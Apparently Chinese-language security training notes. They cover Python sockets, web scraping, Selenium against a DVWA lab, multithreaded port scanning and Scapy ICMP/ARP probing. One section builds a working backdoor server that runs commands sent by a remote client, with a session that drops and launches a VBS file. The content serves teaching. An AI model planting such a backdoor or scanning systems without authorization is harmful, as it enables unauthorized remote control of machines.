import socket
# 定义一个客户端连接
def test_client():
# 建立与服务器的连接
s = socket.socket() # 此类实例的方式,默认使用TCP协议
s.connect(('127.0.0.1', 554)) #服务器的ip地址和端口
# 传输数据(收发数据包)
content = "Welcome to Woniu College"
s.send(content.encode('gbk'))
# 关闭连接
s.close()
test_client()
# 定义一个服务器端
def test_server():
s = socket.socket()
s.bind(('127.0.0.1', 555)) # 绑定服务器端IP和端口号,服务器只要启动就会打开端口
s.listen() # 保持对555端口的监听
while True:
chanel, client = s.accept() # 接收来自客户端的数据()
message = chanel.recv(1024) #设置缓冲区的大小
print(message.decode())
print(client) #('127.0.0.1', 6271)
print(chanel) #<socket.socket fd=268, family=AddressFamily.AF_INET, type=SocketKind.SOCK_STREAM, proto=0, laddr=('127.0.0.1', 555), raddr=('127.0.0.1', 6271)>
test_server()
import socket
def normal_talk():
s = socket.socket()
# s.bind(('127.0.0.1', 6666)) # 只允许本设备访问
s.bind(('0.0.0.0', 6666)) # 所有IP地址均可以访问6666端口
s.listen()
chanel, client = s.accept() # 无法接受多个客户端
while True:
# chanel, client = s.accept() # 此时accept()会进入阻塞状态
receive = chanel.recv(1024).decode()
print(f"收到消息:{receive}")
reply = receive.replace("吗?", "!")
chanel.send(reply.encode()) #服务器向客户机发送信息
# s.close() # 在死循环之后的代码,不可执行
# 核心思路:客户端发送一条特殊字符串,里面包含要执行的命令,让服务器端执行命令并返回结果给客户端
import os
def attack_talk():
try:
s = socket.socket()
s.bind(('0.0.0.0', 6666))
s.listen()
chanel, client = s.accept()
while True:
receive = chanel.recv(1024).decode()
# ==##==,command
if receive.startswith('==##=='):
command = receive.split(',')[-1]
reply = os.popen(command).read()
chanel.send(f"命令{command}的运行结果:\n{reply}".encode())
else:
print(f"收到消息:{receive}")
reply = receive.replace("吗?", "!")
chanel.send(reply.encode())
except:
s.close()
attack_talk()
attack_talk()
import socket
s = socket.socket()
s.connect(('127.0.0.1', 6666))
# s.connect(('192.168.0.106', 6666))
while True:
message = input("请输入消息:")
s.send(message.encode())
receive = s.recv(10240)
print(f"服务器回复:{receive.decode()}")
请输入消息:==##==,echo msgbox("你中招了") > d:\t.vbs
服务器回复:命令echo msgbox("你中招了") > d:\t.vbs的运行结果:
请输入消息:==##==,d:\t.vbs
服务器回复:命令d:\t.vbs的运行结果:
爬虫
DOM:
需要安装lxml
from bs4 import BeautifulSoup
import requests
resp = requests.get('http://www.woniunote.com/')
# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')
# 查找页面元素(根据标签层次进行查找)
print(html.head.title) # 根据标签的层次找页面标题
print(html.head.title.string) # 获取页面标题的文本内容
print(html.div) # 查找页面中的第一个DIV元素
print(html.div.div.div)
查找页面元素的通用方法:
1、find_all:根据标签,属性,XPath等进行查找
from bs4 import BeautifulSoup
import requests
resp = requests.get('http://www.woniunote.com/')
# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')
# 查找页面所有超链接
links = html.find_all('a')
for link in links:
# print(link) # 输出 类似<a class="navbar-brand" href="#">快捷导航</a>
print(link['href']) #输出href属性的值
# 根据id或class等属性查找
keyword = html.find(id='keyword') #查找id属性为keyword的标签,<input class="form-control" id="keyword" οnkeyup="doSearch(event)" placeholder="请输入关键字" type="text"/>
print(keyword)
print(keyword['placeholder']) #输出属性placeholder的值
titles = html.find_all(class_='title') #查找class=“title”的标签
for title in titles:
print(title)
print(title.string)
print(title.find('a')) #查找title中的a标签内容
print(title.find('a').string)
title = html.find(text='揭秘:带你了解学员眼中真实的阿多比!')
print(title.parent) #a href="/article/605">揭秘:带你了解学员眼中真实的阿多比!</a>
print(title.parent.parent) #<div class="title"><a href="/article/605">揭秘:带你了解学员眼中真实的阿多比!</a></div>
# 根据xpath的风格进行查找 //div[@class='title']
titles = html.find_all('div', {'class':'title'})
for title in titles:
print(title.string)
2、select:CSS选择器,div, #id, .class
from bs4 import BeautifulSoup
import requests
resp = requests.get('http://www.woniunote.com/')
# 初始化解析器
html= BeautifulSoup(resp.text, 'lxml')
# CSS选择器
# titles = html.select('div.title')
titles = html.select('.title')
for title in titles:
print(title.string)
keyword = html.select('#keyword')
print(keyword[0]['placeholder'])
lis = html.select('ul li')
print(lis)
基于selenium操作web页面
Chrome驱动器,要对应好版本,相差不大就行。
将下载解压后的exe文件设置环境变量,由于已经将python设置了环境变量,所以可以直接将exe文件放到python目录中
还要设置浏览器的环境变量。
import time
from selenium import webdriver
from selenium.webdriver.common.by import By
# 第一步:先实例化webdriver对象,用于初始化浏览器操作
# 默认情况下,建议将chromedriver.exe等放在PATH环境变量的某个目录中,否则需要在参数executable_path中指定
driver = webdriver.Chrome()
driver.get('http://dvwa/login.php')
time.sleep(1)
print(driver.title) #得到标题的内容
print(driver.page_source) #得到网页源代码
#向网页输入内容
driver.find_element(by=By.NAME,value='username').send_keys("admin") #将name属性值为username的标签赋值amdin
driver.find_element(by=By.NAME,value="password").send_keys("22222")
driver.find_element(by=By.NAME,value="Login").click()
处理SMPT发送邮箱
扫描ip端口
import socket
# 对目标IP进行端口扫描,尝试连接目标IP和端口,如果连接成功,说明端口开放,否则未开放。
def socket_port(ip):
for port in range(1,65536):
try:
s = socket.socket()
s.settimeout(0.5) # 设置无法连接情况下超时时间,提升扫描效率
s.connect((ip, port))
print(f"端口:{port} 可用.")
s.close()
except ConnectionRefusedError:
# print(f"端口:{port} 不可用.")
pass
except socket.timeout:
pass
# 基于多线程进行端口扫描
import socket,threading
def socket_port_thread(ip, start):
for port in range(start, start+50):
try:
s = socket.socket()
s.settimeout(0.5) # 设置无法连接情况下超时时间,提升扫描效率
s.connect((ip, port))
print(f"端口:{port} 可用.")
s.close()
except:
pass
if __name__ == '__main__':
for i in range(1, 5000, 50):
threading.Thread(target=socket_port_thread, args=('192.168.0.107', i)).start()
scapy
发送ICMP报文
>>> send(IP(dst="192.168.0.107")/ICMP())
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.
发送ICMP报文,并带有内容
>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
WARNING: Mac address to reach destination not found. Using broadcast.
.
Sent 1 packets.
发送指定间隔和次数的ICMP
>>> send(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp",inter=1,count=5)
.....
Sent 5 packets.
>>> pkg=sr1(IP(dst="192.168.0.107")/ICMP()/"ppppppppppppppppppp")
Begin emission:
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<IP version=4 ihl=5 tos=0x0 len=47 id=5061 flags= frag=0 ttl=128 proto=icmp chksum=0xa4e3 src=192.168.0.107 dst=192.168.0.106 |<ICMP type=echo-reply code=0 chksum=0x9c0b id=0x0 seq=0x0 unused='' |<Raw load='ppppppppppppppppppp' |>>>
>>> pkg[Raw].load
b'ppppppppppppppppppp'
>>>
构造ARP 请求
通过arp原理,来扫描网络中的ip,因为arp是不会被防火墙阻挡。
>>> pkg=sr1(ARP(psrc="192.168.0.106",pdst="192.168.0.107"))
Begin emission:
WARNING: Mac address to reach destination not found. Using broadcast.
Finished sending 1 packets.
.*
Received 2 packets, got 1 answers, remaining 0 packets
>>> pkg
<ARP hwtype=0x1 ptype=IPv4 hwlen=6 plen=4 op=is-at hwsrc=00:0c:29:50:2e:93 psrc=192.168.0.107 hwdst=e0:d4:e8:c6:41:9d pdst=192.168.0.106 |>
>>>